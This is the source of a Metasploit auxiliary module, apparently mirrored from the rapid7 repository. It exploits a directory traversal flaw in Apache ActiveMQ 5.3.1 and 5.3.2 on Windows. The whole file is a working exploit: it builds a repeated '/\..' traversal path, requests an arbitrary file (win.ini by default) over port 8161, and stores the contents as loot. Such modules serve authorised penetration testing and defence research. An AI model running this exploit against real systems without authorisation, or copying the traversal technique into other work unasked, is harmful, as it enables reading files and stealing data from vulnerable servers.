Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/apache_activemq_traversal.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Apache ActiveMQ Directory Traversal',

16
        'Description' => %q{

17
          This module exploits a directory traversal vulnerability in Apache ActiveMQ

18
          5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's

19
          ResourceHandler installed with the affected versions. This module has been tested

20
          successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'AbdulAziz Hariri', # Vulnerability discovery

25
          'juan vazquez' # Metasploit module

26
        ],

27
        'References' => [

28
          [ 'OSVDB', '86401' ],

29
          [ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],

30
          [ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]

31
        ],

32
        'Notes' => {

33
          'Reliability' => UNKNOWN_RELIABILITY,

34
          'Stability' => UNKNOWN_STABILITY,

35
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

36
        }

37
      )

38
    )

39


40
    register_options(

41
      [

42
        Opt::RPORT(8161),

43
        OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),

44
        OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])

45
      ]

46
    )

47
  end

48


49
  def run_host(ip)

50
    # No point to continue if no filename is specified

51
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?

52
      print_error("#{rhost}:#{rport} - Please supply FILEPATH")

53
      return

54
    end

55


56
    travs = "/\\.." * (datastore['DEPTH'] || 1)

57
    travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"

58
    travs << datastore['FILEPATH']

59


60
    print_status("#{rhost}:#{rport} - Sending request...")

61
    res = send_request_cgi({

62
      'uri' => travs,

63
      'method' => 'GET',

64
    })

65


66
    if res and res.code == 200

67
      contents = res.body

68
      fname = File.basename(datastore['FILEPATH'])

69
      path = store_loot(

70
        'apache.activemq',

71
        'application/octet-stream',

72
        ip,

73
        contents,

74
        fname

75
      )

76
      print_status("#{rhost}:#{rport} - File saved in: #{path}")

77
    else

78
      print_error("#{rhost}:#{rport} - Failed to retrieve file")

79
      return

80
    end

81
  end

82
end

83


84